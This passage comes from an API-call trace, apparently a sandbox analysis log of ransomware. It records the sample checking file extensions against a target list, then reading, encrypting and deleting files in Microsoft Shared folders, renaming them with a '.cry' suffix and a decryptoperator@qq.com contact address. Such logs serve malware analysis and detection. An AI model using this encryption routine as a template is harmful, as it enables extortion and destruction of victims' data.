Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.438] lstrlenW (lpString=".dbf") returned 4 [0051.438] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1 [0051.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.438] lstrlenW (lpString=".1cd") returned 4 [0051.438] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1 [0051.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.438] lstrlenW (lpString=".jpg") returned 4 [0051.438] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1 [0051.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.438] lstrlenW (lpString=".doc") returned 4 [0051.438] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1 [0051.438] lstrlenW (lpString=".docx") returned 5 [0051.438] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1 [0051.438] lstrlenW (lpString=".pdf") returned 4 [0051.438] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1 [0051.438] lstrlenW (lpString=".xls") returned 4 [0051.438] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1 [0051.438] lstrlenW (lpString=".xlsx") returned 5 [0051.438] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1 [0051.438] lstrlenW (lpString=".ppt") returned 4 [0051.438] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1 [0051.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.438] lstrlenW (lpString=".zip") returned 4 [0051.438] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1 [0051.438] lstrlenW (lpString=".rar") returned 4 [0051.438] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1 [0051.438] lstrlenW (lpString=".bz2") returned 4 [0051.438] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1 [0051.438] lstrlenW (lpString=".7z") returned 3 [0051.438] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1 [0051.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.438] lstrlenW (lpString=".dbf") returned 4 [0051.438] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1 [0051.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.439] lstrlenW (lpString=".1cd") returned 4 [0051.439] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1 [0051.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.439] lstrlenW (lpString=".jpg") returned 4 [0051.439] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1 [0051.439] lstrcmpiW (lpString1=".TTF", lpString2=".cry") returned 1 [0051.439] lstrlenW (lpString="MTEXTRA.TTF") returned 11 [0051.439] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0051.439] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=7656) returned 1 [0051.439] CloseHandle (hObject=0x200) returned 1 [0051.439] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf")) returned 0x20 [0051.439] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.439] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0051.439] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.440] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.440] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0051.440] GetLastError () returned 0x0 [0051.440] ReadFile (in: hFile=0x200, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x1de8, lpOverlapped=0x0) returned 1 [0051.546] WriteFile (in: hFile=0x1f0, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0x1df0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x1df0, lpOverlapped=0x0) returned 1 [0051.547] ReadFile (in: hFile=0x200, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.547] WriteFile (in: hFile=0x1f0, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0051.547] SetEndOfFile (hFile=0x1f0) returned 1 [0051.547] CloseHandle (hObject=0x1f0) returned 1 [0051.547] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.547] SetEndOfFile (hFile=0x200) returned 1 [0051.548] CloseHandle (hObject=0x200) returned 1 [0051.548] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.548] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf")) returned 1 [0051.548] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.548] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.549] lstrlenW (lpString=".doc") returned 4 [0051.549] lstrcmpiW (lpString1=".doc", lpString2=".TTF") returned -1 [0051.549] lstrlenW (lpString=".docx") returned 5 [0051.549] lstrcmpiW (lpString1=".docx", lpString2="A.TTF") returned -1 [0051.549] lstrlenW (lpString=".pdf") returned 4 [0051.549] lstrcmpiW (lpString1=".pdf", lpString2=".TTF") returned -1 [0051.549] lstrlenW (lpString=".xls") returned 4 [0051.549] lstrcmpiW (lpString1=".xls", lpString2=".TTF") returned 1 [0051.549] lstrlenW (lpString=".xlsx") returned 5 [0051.549] lstrcmpiW (lpString1=".xlsx", lpString2="A.TTF") returned -1 [0051.549] lstrlenW (lpString=".ppt") returned 4 [0051.549] lstrcmpiW (lpString1=".ppt", lpString2=".TTF") returned -1 [0051.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.549] lstrlenW (lpString=".zip") returned 4 [0051.549] lstrcmpiW (lpString1=".zip", lpString2=".TTF") returned 1 [0051.549] lstrlenW (lpString=".rar") returned 4 [0051.549] lstrcmpiW (lpString1=".rar", lpString2=".TTF") returned -1 [0051.549] lstrlenW (lpString=".bz2") returned 4 [0051.549] lstrcmpiW (lpString1=".bz2", lpString2=".TTF") returned -1 [0051.549] lstrlenW (lpString=".7z") returned 3 [0051.549] lstrcmpiW (lpString1=".7z", lpString2="TTF") returned -1 [0051.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.549] lstrlenW (lpString=".dbf") returned 4 [0051.549] lstrcmpiW (lpString1=".dbf", lpString2=".TTF") returned -1 [0051.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.549] lstrlenW (lpString=".1cd") returned 4 [0051.549] lstrcmpiW (lpString1=".1cd", lpString2=".TTF") returned -1 [0051.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.549] lstrlenW (lpString=".jpg") returned 4 [0051.549] lstrcmpiW (lpString1=".jpg", lpString2=".TTF") returned -1 [0051.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.549] lstrlenW (lpString=".doc") returned 4 [0051.549] lstrcmpiW (lpString1=".doc", lpString2=".TTF") returned -1 [0051.549] lstrlenW (lpString=".docx") returned 5 [0051.549] lstrcmpiW (lpString1=".docx", lpString2="A.TTF") returned -1 [0051.549] lstrlenW (lpString=".pdf") returned 4 [0051.550] lstrcmpiW (lpString1=".pdf", lpString2=".TTF") returned -1 [0051.550] lstrlenW (lpString=".xls") returned 4 [0051.550] lstrcmpiW (lpString1=".xls", lpString2=".TTF") returned 1 [0051.550] lstrlenW (lpString=".xlsx") returned 5 [0051.550] lstrcmpiW (lpString1=".xlsx", lpString2="A.TTF") returned -1 [0051.550] lstrlenW (lpString=".ppt") returned 4 [0051.550] lstrcmpiW (lpString1=".ppt", lpString2=".TTF") returned -1 [0051.550] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.550] lstrlenW (lpString=".zip") returned 4 [0051.550] lstrcmpiW (lpString1=".zip", lpString2=".TTF") returned 1 [0051.550] lstrlenW (lpString=".rar") returned 4 [0051.550] lstrcmpiW (lpString1=".rar", lpString2=".TTF") returned -1 [0051.550] lstrlenW (lpString=".bz2") returned 4 [0051.550] lstrcmpiW (lpString1=".bz2", lpString2=".TTF") returned -1 [0051.550] lstrlenW (lpString=".7z") returned 3 [0051.550] lstrcmpiW (lpString1=".7z", lpString2="TTF") returned -1 [0051.550] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.550] lstrlenW (lpString=".dbf") returned 4 [0051.550] lstrcmpiW (lpString1=".dbf", lpString2=".TTF") returned -1 [0051.550] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.550] lstrlenW (lpString=".1cd") returned 4 [0051.550] lstrcmpiW (lpString1=".1cd", lpString2=".TTF") returned -1 [0051.550] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.550] lstrlenW (lpString=".jpg") returned 4 [0051.550] lstrcmpiW (lpString1=".jpg", lpString2=".TTF") returned -1 [0051.550] lstrcmpiW (lpString1=".dll", lpString2=".cry") returned 1 [0051.550] lstrlenW (lpString="msgfilt.dll") returned 11 [0051.551] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0051.553] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=38768) returned 1 [0051.554] CloseHandle (hObject=0x1f0) returned 1 [0051.554] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll")) returned 0x20 [0051.554] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.554] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0051.554] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.554] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.554] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0051.556] GetLastError () returned 0x0 [0051.556] ReadFile (in: hFile=0x1f0, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x9770, lpOverlapped=0x0) returned 1 [0051.576] WriteFile (in: hFile=0x178, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0x9780, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x9780, lpOverlapped=0x0) returned 1 [0051.577] ReadFile (in: hFile=0x1f0, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.577] WriteFile (in: hFile=0x178, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0051.577] SetEndOfFile (hFile=0x178) returned 1 [0051.578] CloseHandle (hObject=0x178) returned 1 [0051.578] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.578] SetEndOfFile (hFile=0x1f0) returned 1 [0051.579] CloseHandle (hObject=0x1f0) returned 1 [0051.579] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.579] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll")) returned 1 [0051.620] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0051.620] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0051.620] lstrlenW (lpString=".doc") returned 4 [0051.620] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0051.620] lstrlenW (lpString=".docx") returned 5 [0051.620] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0051.620] lstrlenW (lpString=".pdf") returned 4 [0051.620] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0051.620] lstrlenW (lpString=".xls") returned 4 [0051.620] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0051.620] lstrlenW (lpString=".xlsx") returned 5 [0051.620] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0051.620] lstrlenW (lpString=".ppt") returned 4 [0051.620] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0051.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0051.621] lstrlenW (lpString=".zip") returned 4 [0051.621] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0051.621] lstrlenW (lpString=".rar") returned 4 [0051.621] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0051.621] lstrlenW (lpString=".bz2") returned 4 [0051.621] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0051.621] lstrlenW (lpString=".7z") returned 3 [0051.621] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0051.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0051.621] lstrlenW (lpString=".dbf") returned 4 [0051.621] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0051.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0051.621] lstrlenW (lpString=".1cd") returned 4 [0051.621] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0051.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0051.621] lstrlenW (lpString=".jpg") returned 4 [0051.621] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0051.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0051.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0051.621] lstrlenW (lpString=".doc") returned 4 [0051.621] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0051.621] lstrlenW (lpString=".docx") returned 5 [0051.621] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0051.621] lstrlenW (lpString=".pdf") returned 4 [0051.621] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0051.621] lstrlenW (lpString=".xls") returned 4 [0051.621] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0051.621] lstrlenW (lpString=".xlsx") returned 5 [0051.621] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0051.621] lstrlenW (lpString=".ppt") returned 4 [0051.621] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0051.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0051.621] lstrlenW (lpString=".zip") returned 4 [0051.621] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0051.621] lstrlenW (lpString=".rar") returned 4 [0051.621] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0051.621] lstrlenW (lpString=".bz2") returned 4 [0051.622] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0051.622] lstrlenW (lpString=".7z") returned 3 [0051.622] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0051.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0051.622] lstrlenW (lpString=".dbf") returned 4 [0051.622] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0051.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0051.622] lstrlenW (lpString=".1cd") returned 4 [0051.622] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0051.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0051.622] lstrlenW (lpString=".jpg") returned 4 [0051.622] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0051.622] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0051.622] lstrlenW (lpString="VISFILT.DLL") returned 11 [0051.622] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0051.632] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=2124664) returned 1 [0051.632] CloseHandle (hObject=0x21c) returned 1 [0051.632] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll")) returned 0x20 [0051.632] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.632] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0051.633] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0051.633] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0x0) returned 1 [0051.633] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.633] ReadFile (in: hFile=0x21c, lpBuffer=0x3950058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3950058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.702] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xace7d, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.702] ReadFile (in: hFile=0x21c, lpBuffer=0x3990058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3990058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.717] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0051.717] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1c6b78, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.717] ReadFile (in: hFile=0x21c, lpBuffer=0x39d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x39d0058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.786] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.786] WriteFile (in: hFile=0x21c, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2d9fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0051.805] SetEndOfFile (hFile=0x21c) returned 1 [0051.805] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3fd40b0 [0051.810] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0051.810] WriteFile (in: hFile=0x21c, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0051.811] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xace7d, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0051.811] WriteFile (in: hFile=0x21c, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0051.813] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1c6b78, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0051.813] WriteFile (in: hFile=0x21c, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0051.814] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3fd40b0 | out: hHeap=0x600000) returned 1 [0051.814] CloseHandle (hObject=0x21c) returned 1 [0051.814] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0051.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0051.815] lstrlenW (lpString=".doc") returned 4 [0051.816] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0051.816] lstrlenW (lpString=".docx") returned 5 [0051.816] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0051.816] lstrlenW (lpString=".pdf") returned 4 [0051.816] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0051.816] lstrlenW (lpString=".xls") returned 4 [0051.816] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0051.816] lstrlenW (lpString=".xlsx") returned 5 [0051.816] 